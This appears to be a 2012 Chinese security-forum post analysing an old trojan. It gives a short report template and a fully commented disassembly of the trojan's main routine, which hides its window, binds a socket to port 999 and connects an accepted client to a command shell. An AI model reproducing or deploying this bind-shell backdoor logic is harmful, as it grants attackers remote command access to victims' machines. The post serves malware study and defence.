[原创]mini木马分析(菜鸟级不要嘲笑)
发表于: 2012-9-14 21:37 7853
又是一个比较菜的木马分析,很久以前的木马,大家不要见笑。不积跬步无以至千里,我还是慢慢来呵呵。该木马在 999 端口监听,攻击方利用 telnet 即可远程登录。
基本信息
报告名称:mini木马分析
作者:
报告更新日期:
样本发现日期: 2012.09.11
样本类型:
样本文件大小/被感染文件变化长度:
样本文件MD5 校验值:
样本文件SHA1 校验值:
壳信息:
可能受到威胁的系统:
相关漏洞:
已知检测名称:
简介
远程登录木马
网络症状
被监听的端口 999
详细分析/功能介绍
1.隐藏窗口
2.绑定999端口
3.监听等待客户端的连接请求
4.接受客户端的连接(accept)
5.远程登录
预防及修复措施
设置防火墙,关注杀软提示
.text:00411410 wmain proc near ; CODE XREF: j_wmainj
.text:00411410
.text:00411410 var_504 = byte ptr -504h
.text:00411410 CommandLine = word ptr -440h
.text:00411410 StartupInfo = _STARTUPINFOW ptr -238h
.text:00411410 Dst = dword ptr -1ECh
.text:00411410 hObject = dword ptr -1E8h
.text:00411410 addrlen = dword ptr -1D4h
.text:00411410 name = sockaddr ptr -1C8h
.text:00411410 var_1B0 = dword ptr -1B0h
.text:00411410 s = dword ptr -1A4h
.text:00411410 WSAData = WSAData ptr -198h
.text:00411410 var_4 = dword ptr -4
.text:00411410
.text:00411410 push ebp
.text:00411411 mov ebp, esp
.text:00411413 sub esp, 504h
.text:00411419 push ebx
.text:0041141A push esi
.text:0041141B push edi
.text:0041141C lea edi, [ebp+var_504]
.text:00411422 mov ecx, 141h
.text:00411427 mov eax, 0CCCCCCCCh
.text:0041142C rep stosd
.text:0041142E mov eax, __security_cookie
.text:00411433 xor eax, ebp
.text:00411435 mov [ebp+var_4], eax
.text:00411438 mov esi, esp
隐藏窗口
.text:0041143A push 0 ; nCmdShow
.text:0041143C push 0 ; hWnd
.text:0041143E call ds:__imp__ShowWindow@8 ; ShowWindow(x,x)
初始化数据
.text:00411444 cmp esi, esp
.text:00411446 call j__RTC_CheckEsp; unicode校验函数
.text:0041144B push 10h ; Size
.text:0041144D push 0 ; Val
.text:0041144F lea eax, [ebp+Dst]
.text:00411455 push eax ; Dst
.text:00411456 call j__memset
.text:0041145B add esp, 0Ch
.text:0041145E push 44h ; Size
.text:00411460 push 0 ; Val
.text:00411462 lea eax, [ebp+StartupInfo]
.text:00411468 push eax ; Dst
.text:00411469 call j__memset
.text:0041146E add esp, 0Ch
.text:00411471 push 0FFh ; Size
.text:00411476 push 0 ; Val
.text:00411478 lea eax, [ebp+CommandLine]
.text:0041147E push eax ; Dst
.text:0041147F call j__memset
.text:00411484 add esp, 0Ch
.text:00411487 mov esi, esp
.text:00411489 push 1FEh ; nSize
.text:0041148E lea eax, [ebp+CommandLine]
.text:00411494 push eax ; lpBuffer
.text:00411495 push offset Name ;
COMSPEC 变量表示为: COMSPEC=C:\COMMAND.COM 获取命令行路径
.text:0041149A call ds:__imp__GetEnvironmentVariableW@12 ; GetEnvironmentVariableW(x,x,x)
.text:004114A0 cmp esi, esp
.text:004114A2 call j__RTC_CheckEsp
.text:004114A7 mov esi, esp
.text:004114A9 lea eax, [ebp+WSAData]
套接字编程的初始化
.text:004114AF push eax ; lpWSAData
.text:004114B0 push 202h ; wVersionRequested
.text:004114B5 call ds:__imp__WSAStartup@8 ; WSAStartup(x,x)
.text:004114BB cmp esi, esp
.text:004114BD call j__RTC_CheckEsp
.text:004114C2 mov esi, esp
创建套接字
.text:004114C4 push 0 ; dwFlags
.text:004114C6 push 0 ; g
.text:004114C8 push 0 ; lpProtocolInfo
.text:004114CA push 6 ; protocol
.text:004114CC push 1 ; type
.text:004114CE push 2 ; af
.text:004114D0 call ds:__imp__WSASocketW@24 ; WSASocketW(x,x,x,x,x,x)
.text:004114D6 cmp esi, esp
.text:004114D8 call j__RTC_CheckEsp
.text:004114DD mov [ebp+s], eax
.text:004114E3 mov eax, 2
.text:004114E8 mov [ebp+name.sa_family], ax
.text:004114EF mov dword ptr [ebp+name.sa_data+2], 0
.text:004114F9 mov esi, esp
.text:004114FB push 999 ; hostshort
.text:00411500 call ds:__imp__htons@4 ; htons(x)
.text:00411506 cmp esi, esp
.text:00411508 call j__RTC_CheckEsp
.text:0041150D mov word ptr [ebp+name.sa_data], ax
.text:00411514 mov esi, esp
绑定端口999
.text:00411516 push 10h ; namelen
.text:00411518 lea eax, [ebp+name]
.text:0041151E push eax ; name
.text:0041151F mov ecx, [ebp+s]
.text:00411525 push ecx ; s
.text:00411526 call ds:__imp__bind@12 ;
.text:0041152C cmp esi, esp
.text:0041152E call j__RTC_CheckEsp
.text:00411533 mov esi, esp
监听
.text:00411535 push 1 ; backlog
.text:00411537 mov eax, [ebp+s]
.text:0041153D push eax ; s
.text:0041153E call ds:__imp__listen@8 ;
.text:00411544 cmp esi, esp
.text:00411546 call j__RTC_CheckEsp
.text:0041154B mov [ebp+addrlen], 10h
.text:00411555 mov esi, esp
连接远程服务器
.text:00411557 lea eax, [ebp+addrlen]
.text:0041155D push eax ; addrlen
.text:0041155E lea ecx, [ebp+name]
.text:00411564 push ecx ; addr
.text:00411565 mov edx, [ebp+s]
.text:0041156B push edx ; s
.text:0041156C call ds:__imp__accept@12 ;
.text:00411572 cmp esi, esp
.text:00411574 call j__RTC_CheckEsp
.text:00411579 mov [ebp+var_1B0], eax
.text:0041157F mov [ebp+StartupInfo.cb], 44h
.text:00411589 xor eax, eax
.text:0041158B mov [ebp+StartupInfo.wShowWindow], ax
.text:00411592 mov [ebp+StartupInfo.dwFlags], 101h
.text:0041159C mov eax, [ebp+var_1B0]
.text:004115A2 mov [ebp+StartupInfo.hStdError], eax ; 设置进程的输入输出缓冲区句柄为套接字
.text:004115A8 mov eax, [ebp+var_1B0]
.text:004115AE mov [ebp+StartupInfo.hStdInput], eax
.text:004115B4 mov eax, [ebp+var_1B0]
.text:004115BA mov [ebp+StartupInfo.hStdOutput], eax
.text:004115C0 mov esi, esp
.text:004115C2 lea eax, [ebp+Dst]
.text:004115C8 push eax ; lpProcessInformation
.text:004115C9 lea ecx, [ebp+StartupInfo]
创建进程 打开命令行 命令行的输入输出缓冲区为 已套接字
.text:004115CF push ecx ; lpStartupInfo
.text:004115D0 push 0 ; lpCurrentDirectory
.text:004115D2 push 0 ; lpEnvironment
.text:004115D4 push 0 ; dwCreationFlags
.text:004115D6 push 1 ; bInheritHandles
.text:004115D8 push 0 ; lpThreadAttributes
.text:004115DA push 0 ; lpProcessAttributes
.text:004115DC lea edx, [ebp+CommandLine]
.text:004115E2 push edx ; lpCommandLine
.text:004115E3 push 0 ; lpApplicationName
.text:004115E5 call ds:__imp__CreateProcessW@40 ; CreateProcessW(x,x,x,x,x,x,x,x,x,x)
.text:004115EB cmp esi, esp ;
.text:004115ED call j__RTC_CheckEsp
.text:004115F2 mov esi, esp
等待进程创建完毕
.text:004115F4 push 0FFFFFFFFh ; dwMilliseconds
.text:004115F6 mov eax, [ebp+Dst]
.text:004115FC push eax ; hHandle
.text:004115FD call ds:__imp__WaitForSingleObject@8 ; WaitForSingleObject(x,x)
.text:00411603 cmp esi, esp ;
.text:00411605 call j__RTC_CheckEsp
.text:0041160A mov esi, esp
.text:0041160C mov eax, [ebp+Dst]
.text:00411612 push eax ; hObject
.text:00411613 call ds:__imp__CloseHandle@4 ; CloseHandle(x)
.text:00411619 cmp esi, esp
.text:0041161B call j__RTC_CheckEsp
.text:00411620 mov esi, esp
.text:00411622 mov eax, [ebp+hObject]
.text:00411628 push eax ; hObject
.text:00411629 call ds:__imp__CloseHandle@4 ; CloseHandle(x)
.text:0041162F cmp esi, esp
.text:00411631 call j__RTC_CheckEsp
.text:00411636 mov esi, esp ; 关闭句柄
.text:00411638 mov eax, [ebp+s]
.text:0041163E push eax ; s
.text:0041163F call ds:__imp__closesocket@4 ; closesocket(x)
.text:00411645 cmp esi, esp
.text:00411647 call j__RTC_CheckEsp
.text:0041164C mov esi, esp
.text:0041164E mov eax, [ebp+var_1B0]
.text:00411654 push eax ; s
.text:00411655 call ds:__imp__closesocket@4 ; closesocket(x)
.text:0041165B cmp esi, esp
.text:0041165D call j__RTC_CheckEsp
.text:00411662 mov esi, esp
.text:00411664 call ds:__imp__WSACleanup@0 ; WSACleanup()
.text:0041166A cmp esi, esp
.text:0041166C call j__RTC_CheckEsp ; 关闭套接字,释放dll
.text:00411671 xor eax, eax
.text:00411673 push edx
.text:00411674 mov ecx, ebp
.text:00411676 push eax
.text:00411677 lea edx, dword_4116A4
.text:0041167D call j__RTC_CheckStackVars
.text:00411682 pop eax
.text:00411683 pop edx
.text:00411684 pop edi
.text:00411685 pop esi
.text:00411686 pop ebx
.text:00411687 mov ecx, [ebp+var_4]
.text:0041168A xor ecx, ebp
.text:0041168C call j___security_check_cookie
.text:00411691 add esp, 504h
.text:00411697 cmp ebp, esp
.text:00411699 call j__RTC_CheckEsp
.text:0041169E mov esp, ebp
.text:004116A0 pop ebp
.text:004116A1 retn
.text:004116A1 wmain endp
.text:004116A1